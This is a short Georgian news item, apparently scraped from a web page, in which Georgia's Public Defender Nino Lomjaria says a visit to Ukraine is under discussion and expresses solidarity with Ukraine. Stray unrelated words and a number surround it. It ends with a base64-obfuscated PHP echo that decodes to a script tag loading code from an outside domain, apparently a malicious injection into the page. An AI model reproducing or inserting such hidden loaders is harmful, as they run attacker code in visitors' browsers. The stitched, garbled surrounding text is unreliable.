celsiusi
ავერსი შნაიდერი
საქართველოს სახალხო დამცველი, ნინო ლომჯარია აცხადებს, რომ განიხილება მისი ვიზიტი უკრაინაში.
 
სახალხო დამცველის თქმით, უსაფრთხოების ინტერესებიდან გამომდინარე წინასწარ დეტალებზე ვერ ისაუბრებს.
 
„დღეს გავრცელდა ინფორმაცია უკრაინაში ჩემ შესაძლო ვიზიტთან დაკავშირებით. ომის დაწყების დღიდან ვფიქრობ, როგორ შეიძლება გამოვხატო სოლიდარობა უკრაინელი ხალხის და მათი სახელმწიფოს მიმართ. ერთ-ერთი საკითხია ვიზიტი უკრაინაში, რომელიც იდეის და მონახაზის დონეზე განიხილება ჩვენ უკრაინელ კოლეგებთან. უსაფრთხოების ინტერესებიდან გამომდინარე, ბუნებრივია, მეტ დეტალზე არ და ვერ ვისაუბრებ.
 
წარმატებები უკრაინას და გმირ უკრაინელ ხალხს!“, - წერს ნინო ლომჯარია
763
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");